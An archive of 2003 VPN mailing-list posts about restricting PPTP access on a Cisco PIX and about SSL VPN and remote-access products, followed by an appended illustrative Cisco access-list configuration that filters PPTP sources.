For remote access, stick with IPSec so that you can enforce strong authentication, firewall rules, and verify the presence of virus scanners.

-S

From ghezzi_silvia at yahoo.de Tue Apr 29 03:26:54 2003
From: ghezzi_silvia at yahoo.de (silvia ghezzi)
Date: Tue, 29 Apr 2003 00:26:54 -0700 (PDT)
Subject: [VPN] VPN on Cisco PIX
Message-ID: <20030429072654.21106.qmail@web21010.mail.yahoo.com>

Hello,

I have enabled a PPTP VPN to my CISCO PIX, but I cannot find the way to filter the public source IP address to establish VPN with PIX, so at the moment everybody can create a VPN with us and we don't want this.

Is there a way to prevent this?

Many thanks
Regards

Silvia

__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com

From safieradam at hotmail.com Tue Apr 29 05:03:07 2003
From: safieradam at hotmail.com (safieradam)
Date: Tue, 29 Apr 2003 05:03:07 -0400
Subject: [VPN] SSL VPN
References: <20030429023323.S53613-100000@sisyphus.iocaine.com>

Check out www.GoToMyPC.com.
There are several similar products but this one is advertising heavily where I tend to go.

Adam

From pjacob at ftmc.com Tue Apr 29 08:24:00 2003
From: pjacob at ftmc.com (Pete Jacob)
Date: 29 Apr 2003 08:24:00 -0400
Subject: [VPN] SSL VPN
Message-ID: <1051619039.2114.8.camel@Pete.Ftmc.Com>

hello Vincent,

one thing you can try is Netilla, it is an appliance running a hardened version of Apache, and Linux... it is an SSL appliance to connect to your internal machines, supposedly they are the only manufacturer to be licensed from MicroSloth to reverse engineer MS's RDP protocol... This thing is pretty sweet, and would be worth your time to look into... I had a Netilla rep. come on site to do a demo... I have some contacts if you'd be interested... it is priced pretty cheap... basically you get the box for free, and you just pay per user... the same amount as if you were paying for individual Citrix licenses... they even have 30 day demos that do not require a contingent purchase order...

It's a very nice way to web enable many non-web applications thru a common secure web interface.

Pete Jacob
Fisher-Titus Medical Center

From TSimons at Delphi-Tech.com Tue Apr 29 12:57:54 2003
From: TSimons at Delphi-Tech.com (TSimons at Delphi-Tech.com)
Date: Tue, 29 Apr 2003 12:57:54 -0400
Subject: [VPN] PIX <-> SEF S2S VPN
Message-ID: <880E60DA7286AB4CBEECB01B169A63BD0379D41E@NJ-2K-Email1.delphi-tech.com>

Hello All.

I'm a newbie to this list, sorry for any faux pas...

I'm wondering what success rate others have had with the new Cisco PIX v6.3 with S2S VPN tunnels to non-PIX partners.
We have multiple SEF (Symantec Enterprise Firewall) to PIX VPNs. Prior to IOS v6.22.120 and v6.3, if the tunnels would time out, one side or the other had to be rebooted because of an alleged memory leak on the PIX side.

Any input is greatly appreciated.

Thanks,
~Todd

__________________________________
Todd M. Simons
Senior MIS Engineer
Dell Tier 1 PA Technician
Delphi Technology, Inc.
New Brunswick, NJ
God Bless America and those who defend her.

From shannong at texas.net Tue Apr 29 20:26:45 2003
From: shannong at texas.net (shannong)
Date: Tue, 29 Apr 2003 19:26:45 -0500
Subject: [VPN] SSL VPN
Message-ID: <003101c30eaf$31625760$0101a8c0@ASTEROID>

From a security standpoint, GoToMyPC is a really bad idea. Providing a third party with unadulterated access to machines on your internal network is not taking your internal security very seriously. In addition to giving that provider access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively.

From shannong at texas.net Tue Apr 29 20:30:37 2003
From: shannong at texas.net (shannong)
Date: Tue, 29 Apr 2003 19:30:37 -0500
Subject: [VPN] SSL VPN
In-Reply-To: <1051619039.2114.8.camel@Pete.Ftmc.Com>
Message-ID: <003201c30eaf$bb6b6870$0101a8c0@ASTEROID>

I checked out Netilla as well. It seemed attractive, but we were looking for a solution that provided network layer access for fat-client applications on laptops in addition to web-browser access. Also, the graphic resolution is low (a la RDP), so you can't use it for hi-res graphic applications.

From shannong at texas.net Tue Apr 29 20:33:59 2003
From: shannong at texas.net (shannong)
Date: Tue, 29 Apr 2003 19:33:59 -0500
Subject: [VPN] VPN on Cisco PIX
In-Reply-To: <20030429072654.21106.qmail@web21010.mail.yahoo.com>
Message-ID: <003801c30eb0$33b52b90$0101a8c0@ASTEROID>

No. VPDN cannot be restricted by IP on the Pix.
Instead, you'll need to use an ACL on the router in front. You can do real VPNs using IPSec and specify the IPs that can have access by defining their pre-shared keys for IKE. All others will fail.

-Shannon

From guy.raymakers at eds.com Wed Apr 30 06:50:04 2003
From: guy.raymakers at eds.com (Raymakers, Guy)
Date: Wed, 30 Apr 2003 11:50:04 +0100
Subject: [VPN] Checkpoint NG FP2

I'm trying to set up a VPN between two Nokia IP350's running Checkpoint NG FP2. I've used the internal_ca to generate certificates on both systems. When the two systems try to establish the IPsec connection, I only see in the logs 'invalid certificate' and certificate validation timeouts. Any ideas, and is there a possibility to use pre-shared keys (between two fully managed FP2 Checkpoints)?

Many thanks,
Guy

From roger.qian at sholodge.com Wed Apr 30 11:36:45 2003
From: roger.qian at sholodge.com (Roger Qian)
Date: Wed, 30 Apr 2003 10:36:45 -0500
Subject: [VPN] SSL VPN

How is pcANYWHERE? Same as GoToMyPC from a security standpoint?
Thanks,
Roger

From djdawso at qwest.com Wed Apr 30 13:09:39 2003
From: djdawso at qwest.com (Dana J. Dawson)
Date: Wed, 30 Apr 2003 12:09:39 -0500
Subject: [VPN] VPN on Cisco PIX
References: <003801c30eb0$33b52b90$0101a8c0@ASTEROID>
Message-ID: <3EB00353.7060705@qwest.com>

Actually, you can, but you have to remove the "sysopt connection permit-pptp" command that is usually used. In this case, you have to permit all the incoming traffic to the PIX with an access-list (or conduit, I suppose), including the PPTP traffic (GRE and TCP/1723). Since you're using an access-list to allow that traffic, you can also restrict the source, which is what you want.

HTH

Dana

--
Dana J. Dawson                   djdawso at qwest.com
Senior Staff Engineer            CCIE #1937
Qwest Communications             (612) 664-3364
600 Stinson Blvd., Suite 1S      (612) 664-4779 (FAX)
Minneapolis MN 55413-2620

"Hard is where the money is."

shannong wrote:
> No. VPDN cannot be restricted by IP on the Pix. Instead, you'll need
> to use an ACL on the router in front. You can do real VPNs using IPSec
> and specify the IPs that can have access by defining their pre-shared
> keys for IKE. All others will fail.
>
> -Shannon

From TSimons at Delphi-Tech.com Wed Apr 30 14:37:47 2003
From: TSimons at Delphi-Tech.com (TSimons at Delphi-Tech.com)
Date: Wed, 30 Apr 2003 14:37:47 -0400
Subject: [VPN] SSL VPN
Message-ID: <880E60DA7286AB4CBEECB01B169A63BD0379D463@NJ-2K-Email1.delphi-tech.com>

Check out "Proxy" by Funk Software (www.funk.com). We utilize this through VPN connections, it works great! The only downfall is it works on UDP traffic; TCP functionality is due in the next few months.

~Todd
-----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam ----- Original Message ----- From: "Tina Bird" To: "Bartsch, Vincent" Cc: Sent: Monday, April 28, 2003 10:36 PM Subject: Re: [VPN] SSL VPN > On Mon, 28 Apr 2003, Bartsch, Vincent wrote: > > > I am researching everything about SSL and its use as a VPN solution. I am > > aware of some of > > its limitations but I was wondering has anyone tried this: allowed an SSL > > connection to a web > > server that lets the user open a connection to a terminal server. Or can > > it be configured to > > connect to a terminal server via an SSL connection directly? Has anyone tried > > this, were they > > successful? > > Hi Vincent -- I don't have anything that will be immediately useful, but > we had a bit of a discussion about SSL-based VPNs. The responses to my > original posting included a lot of experience the writers had had, so it > might be very useful for you. > > http://vpn.shmoo.com -- click on SSL VPNs & Other Misc > > cheers -- tbird > > -- > It's not the size of the key, it's the implementation of the algorithm... 
> > -- Natasha Smith > > http://www.shmoo.com/~tbird > Log Analysis http://www.loganalysis.org > VPN http://vpn.shmoo.com > Security Alerts http://securecomputing.stanford.edu/alert.html > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From cgripp at automotive.com Wed Apr 30 15:37:12 2003 From: cgripp at automotive.com (Chris Gripp) Date: Wed, 30 Apr 2003 12:37:12 -0700 Subject: [VPN] SSL VPN Message-ID: I'd say remote control accessible from the internet without source IP filtering is generally a bad idea regardless of the implementation. Anyone could just sit and bang away at a login prompt. Now, hopefully you are using strong password policies, etc. to mitigate the risk, but it still doesn't give me a warm and fuzzy feeling knowing anyone could just keep trying till they get bored or succeed. -Chris -----Original Message----- From: Roger Qian [mailto:roger.qian at sholodge.com] Sent: Wednesday, April 30, 2003 8:37 AM To: shannong Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN How is pcANYWHERE? Same as GoToMyPC from a security standpoint? Thanks, Roger -----Original Message----- From: shannong [mailto:shannong at texas.net] Sent: Tuesday, April 29, 2003 7:27 PM Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN From a security standpoint, GoToMyPC is a really bad idea. Providing a third party with unadulterated access to machines on your internal network is not taking your internal security very seriously. 
In addition to giving that provider access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. Adam 
_______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From shannong at texas.net Wed Apr 30 21:23:10 2003 From: shannong at texas.net (shannong) Date: Wed, 30 Apr 2003 20:23:10 -0500 Subject: [VPN] VPN on Cisco PIX In-Reply-To: <3EB00353.7060705@qwest.com> Message-ID: <005d01c30f80$3b9f44f0$0101a8c0@ASTEROID> The [sysopt connection permit-pptp] affects what things the VPDN client can access after a successful session is established, which means everything. Without that sysopt command, you would need to define what things a VPN client can access with ACLs, as the usual rule of deny all would be in effect when accessing higher security interfaces. That sysopt command does not affect what addresses can connect to the Pix for PPTP sessions. Also, ACLs applied to a Pix's interface do not affect traffic destined to the Pix itself, such as establishing a PPTP session. That's why you use the commands icmp, telnet, ssh, etc. to affect who/what can talk to the Pix, because normal ACLs on interfaces don't stop/allow traffic destined to the Pix. Filtering the source address of those terminating VPN tunnels seemed to be the question asked. If that is the question, it cannot be done on the Pix itself. An ACL would need to be created on a device in front of the Pix to limit who could connect to GRE/1723. 
-----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Dana J. Dawson Sent: Wednesday, April 30, 2003 12:10 PM To: vpn at lists.shmoo.com Subject: Re: [VPN] VPN on Cisco PIX Actually, you can, but you have to remove the "sysopt connection permit-pptp" command that is usually used. In this case, you have to permit all the incoming traffic to the PIX with an access-list (or conduit, I suppose), including the PPTP traffic (GRE and TCP/1723). Since you're using an access-list to allow that traffic, you can also restrict the source, which is what you want. HTH Dana -- Dana J. Dawson djdawso at qwest.com Senior Staff Engineer CCIE #1937 Qwest Communications (612) 664-3364 600 Stinson Blvd., Suite 1S (612) 664-4779 (FAX) Minneapolis MN 55413-2620 "Hard is where the money is." shannong wrote: > No. VPDN cannot be restricted by IP on the Pix. Instead, you'll need > to use an ACL on the router in front. You can do real VPNs using IPSec > and specify the IPs that can have access by defining their pre-shared > keys for IKE. All others will fail. > > -Shannon > > -----Original Message----- > From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On > Behalf Of silvia ghezzi > Sent: Tuesday, April 29, 2003 2:27 AM > To: vpn at lists.shmoo.com > Subject: [VPN] VPN on Cisco PIX > > Hello, > > I have enabled a PPTP VPN to my CISCO PIX, but I > cannot find the way to filter the public source IP > address to establish VPN with PIX, so at the moment > everybody can create a VPN with us and we don't want > this. > > Is there a way to prevent this? 
> > Many thanks > Regards > > Silvia _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From shannong at texas.net Wed Apr 30 21:25:14 2003 From: shannong at texas.net (shannong) Date: Wed, 30 Apr 2003 20:25:14 -0500 Subject: [VPN] SSL VPN In-Reply-To: Message-ID: <005e01c30f80$87b5b950$0101a8c0@ASTEROID> Worse. For it to work, you would need to allow access for the entire Internet to establish inbound sessions to the host. At least GoToMyPC doesn't require an open port inbound. The PC establishes the session outbound. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of Roger Qian Sent: Wednesday, April 30, 2003 10:37 AM To: shannong Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN How is pcANYWHERE? Same as GoToMyPC from a security standpoint? Thanks, Roger -----Original Message----- From: shannong [mailto:shannong at texas.net] Sent: Tuesday, April 29, 2003 7:27 PM Cc: vpn at lists.shmoo.com Subject: RE: [VPN] SSL VPN From a security standpoint, GoToMyPC is a really bad idea. Providing a third party with unadulterated access to machines on your internal network is not taking your internal security very seriously. In addition to giving that provider access, when they get hacked this perpetrator will have access to your PCs as well. GoToMyPC has HIPAA and GLBA issues which make it a legal issue in healthcare and finance, respectively. -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of safieradam Sent: Tuesday, April 29, 2003 4:03 AM To: Tina Bird; Bartsch, Vincent Cc: vpn at lists.shmoo.com Subject: Re: [VPN] SSL VPN Check out www.GoToMyPC.com. There are several similar products but this one is advertising heavily where I tend to go. 
Adam 
_______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From john.spanos at adacel.com Wed Apr 30 21:49:48 2003 From: john.spanos at adacel.com (John Spanos) Date: Thu, 1 May 2003 11:49:48 +1000 Subject: [VPN] Re: Watchguard VClass VPN In-Reply-To: <20030419060148.89613.qmail@web12706.mail.yahoo.com> Message-ID: Hi All, just a quick and easy question. Has anyone implemented an IPSec tunnel on a Watchguard VClass (we are using V80) that terminates on a DMZ interface? Or can anyone confirm that this IS actually possible? Thanks. John Spanos.
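Added example for the "VPN on Cisco PIX" exchange above (Silvia's question, Dana Dawson's answer and shannong's reply). It is not from any post in this archive; it shows what the two suggested placements of the source filter look like in Cisco syntax. Everything concrete in it is an assumption for illustration: the PIX outside address 203.0.113.1, the one trusted PPTP peer 198.51.100.10, a VPDN client pool of 10.1.1.0/24, an inside network of 10.0.0.0/24, the ACL names, and the router interface Serial0/0. The first part follows Dana's approach on the PIX itself (PIX 6.x syntax); the second follows shannong's approach on the router in front of it. The two posts disagree on whether a PIX interface ACL is consulted at all for PPTP traffic terminating on the PIX, so the check at the end is what settles it on your own box: if the hit counters on the outside ACL entries climb while a PPTP client connects, the filter is taking effect there; if they stay at zero while the tunnel still comes up, you need the upstream router ACL.

```cisco
! ---- Part 1: filter on the PIX (Dana's approach, PIX 6.x syntax) ----
! Removing the sysopt means PPTP setup traffic to the PIX, and traffic from
! established PPTP clients, is no longer exempt from the outside ACL.
no sysopt connection permit-pptp

! Only the trusted peer (assumed 198.51.100.10) may set up PPTP to the
! outside address (assumed 203.0.113.1): TCP/1723 control, GRE data.
access-list outside_in permit tcp host 198.51.100.10 host 203.0.113.1 eq 1723
access-list outside_in permit gre host 198.51.100.10 host 203.0.113.1

! Without the sysopt, shannong's point applies: decapsulated client traffic
! now needs its own permits. Assumed VPDN pool 10.1.1.0/24, inside 10.0.0.0/24.
access-list outside_in permit ip 10.1.1.0 255.255.255.0 10.0.0.0 255.255.255.0

! Everything else arriving on the outside is dropped by the implicit deny.
access-group outside_in in interface outside

! ---- Part 2: filter on the router in front (shannong's approach, IOS) ----
! Assumed: Serial0/0 faces the Internet. PPTP setup from the trusted peer is
! passed to the PIX; every other PPTP attempt at the PIX is dropped before the
! PIX sees it; unrelated traffic (published web servers etc.) is untouched.
ip access-list extended PPTP_TO_PIX
 permit tcp host 198.51.100.10 host 203.0.113.1 eq 1723
 permit gre host 198.51.100.10 host 203.0.113.1
 deny   tcp any host 203.0.113.1 eq 1723
 deny   gre any host 203.0.113.1
 permit ip any any
interface Serial0/0
 ip access-group PPTP_TO_PIX in

! ---- Check: which filter is actually consulted ----
! Connect from the trusted peer, then from an untrusted address, and read
! the per-entry hit counts. On the PIX:
!   show access-list outside_in
! On the router (the two deny lines should count the untrusted attempts):
!   show ip access-lists PPTP_TO_PIX
```

If you keep the router ACL, still remove the sysopt on the PIX: it is the only thing that confines a client that did get a session to the destinations you intended rather than to everything behind the higher-security interface.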